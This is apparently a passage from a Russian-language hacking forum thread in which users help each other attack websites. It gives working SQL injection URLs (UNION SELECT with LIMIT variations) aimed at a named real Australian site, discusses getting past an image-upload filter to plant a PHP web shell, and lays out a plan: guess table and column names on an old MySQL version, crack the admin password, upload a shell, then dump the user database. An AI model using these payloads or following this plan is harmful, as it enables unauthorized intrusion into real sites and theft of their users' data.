[Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.

durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого

index.php?id=37+and+if(5=4,NULL,NUll)+union+select +1,2/*

но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу

index.php?id=37+and+1=2+union+select+1,2/*

[QUOTE="Konqi"]
ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS..
при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница
то есть если контент файла
то на странице видна только символ '[/COLOR][/COLOR]
[/PHP]
то на странице видна только символ '

Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:

index.php?id=37+limit+0+union+select+1,2/*

Ну или так:

index.php?id=37+union+select+1,2+limit+1,1/*

вот поjaлсута помоqите раскрутить..

как то не получается

http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*

в первом случае The profile is not active!

во-втором тоже самое

http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*

проходит, но толку

версия базы 4.0.21-log так что все равно брутом надо табелки подбирать

Gorev брутом тянуть базу юзеров это анреал

что бы тебе тянуть брутом базу юзверей..тебе надо добратся до таблички и до колонок сперва... так как я сказал что версия базы 4-я и информатион схемы нет..так что подбери сначала имена табличек и колонок нужные..и только потом думай про дамп базы...вариантов несколько..ты подбираешь пасс админа и через админку заливаешь шелл ..а там уже и доступ прямой к базе..либо используешь какую нибудь тулзу для скулей..например сипт или что быстрее будет, тулзу от Пашкелы...